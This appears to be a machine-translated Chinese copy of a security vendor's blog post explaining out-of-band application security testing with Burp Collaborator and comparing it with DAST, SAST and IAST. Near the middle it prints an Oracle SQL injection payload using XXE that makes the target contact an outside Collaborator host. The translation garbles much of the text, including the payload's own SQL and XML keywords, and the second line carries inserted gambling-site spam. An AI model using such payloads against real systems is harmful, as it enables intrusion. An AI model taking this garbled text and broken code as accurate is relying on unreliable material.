本周谈到了几个“思想领袖”类型,我意识到不是每个人都完全赞赏的力量和创新乐队应用安全测试(Oast.)。
在Pobeplay官网可以赌rtswiggigge,我们不进入营销炒作,更愿意释放起始特征,准确描述它们,让用户弥补自己的思想。当我们第一次发布时Burp Collaborator.当我们的用户看到它在揭露现实世界漏洞时,立即正面反馈很快就变成了卓越的赞美。
多年来,最熟练的手工渗透测试仪一直在使用带外测试技术,但这通常涉及建立一些自定义私人基础架构,并手动将任何与测试人员活动的网络交互相关联。此外,已经发表了关于如何在不同情况下启动频段外网络交互的易受攻击的应用程序。
Burp Collaborator以三种方式革命性:
- 它使群众提供了oasts,只是开箱即用具有零配置,无需任何私人基础架构。
- Burp Suite Research Team开发了创新的技术,可靠地触发广泛漏洞的乐队外交互,包括盲目的SQL注射那盲目的横向网站脚本那盲目xxe.那盲人服务器端XML / SOAP注入那盲卫操作系统指挥注射, 和SMTP标题注射。
- 通过一点魔法,Burp Collaborator将每个带外交互与导致它的确切请求和有效载荷相关联,即使互动被推迟并且由于一个人而发生的日子异步漏洞。
应用安全测试的景观通常分为动态(达斯),静态(SAST)和互动(IAST)技术。营销除此之外,这些方法的相对优势和弱点都很好地理解。但似乎并不是每个人都在借助带外(Oast)技术的纯粹力量,以及Oast对其他方法的强烈优势。所以我们决定,也许是时候明确地拼出这些问题,这样每个人都可以考虑它们。
但首先,究竟是什么oast?
Oast将常规DAST的输送机制与IAST的侦探力相结合。它动态运行,将有效载荷发送到正在运行的应用程序。这些有效载荷以正常方式通过应用程序的处理。如果有效载荷以不安全的方式处理,它有效地执行了一些地理仪表以改变应用程序的行为,导致它与外部系统进行网络交互(通常是DNS)。该交互的内容允许OAST工具报告可用于触发它的精确类型的漏洞和输入点。
以下是OAST有效载荷的示例,如果在对Oracle数据库中的SQL查询中不再使用它,将导致与Burp Collaborator服务器的连接:
'||(选择ExtractValue(XMLType('<?XML版本=“1.0”编码=“UTF-8”?>
<!doctype根[<!实体%EKIOM系统
“http://pibw1f1nhjh3vpkgtx6mtfnt8kea2eq8dy1n.burpcollab'||'Orator.net/”>
双重)%ekiom;]>'),'/ l')||'
那么OAST如何表现出应用安全测试的其他方法?
- 达斯无法检测到应用程序响应中完全看不见的众多漏洞,其中成功的有效载荷导致响应内容或时序无差异。扫描完成后,也无法检测到异步触发的漏洞。反过来,Oast.能够找到完全不可见和延迟的漏洞。
- 斯塔斯令人难以置信的是通过误报产生噪音。虽然它通常可以找到达斯不可见的模糊漏洞,但遗憾的是在需要手动调查的发现中遗失了这些问题。反过来,Oast.几乎是零误报。如果上述有效载荷导致交互,则将我们注入Oracle SQL查询。
- IAST.涉及对运行应用程序进行侵入性更改以注入仪器。这是易于引入缺陷,损害性能,创造新的攻击表面。它肯定不应该用于生产系统。反过来,Oast.涉及对正在测试的系统的修改,因为仪器在有效载荷中自包含,并且仅在有效载荷达到漏洞的位置就轨。
此外,像DAST一样,OAST有利于可靠的申请中使用的语言和平台而无关。以上的OAST有效载荷适用于以相关方式使用Oracle的任何应用程序,并且不关心该应用程序是否用Java,.NET,PHP或其他任何其他应用程序编写。相反,SAST和IAST都与特定技术密切相关,有关的工具需要大大重写和维护他们瞄准的每种语言和平台。从测试工具的创建者的角度来看,为达斯特和烤箱工具提供良好的技术覆盖率,它更为现实。在Oast方向上的工具供应商之间存在明显的趋势,Acunetix和Netsparker在同一方向上移动。
我们希望这篇文章有助于传达OAST的纯粹的权力和创新,以及它如何与其他方法测试的性质和能力不同。
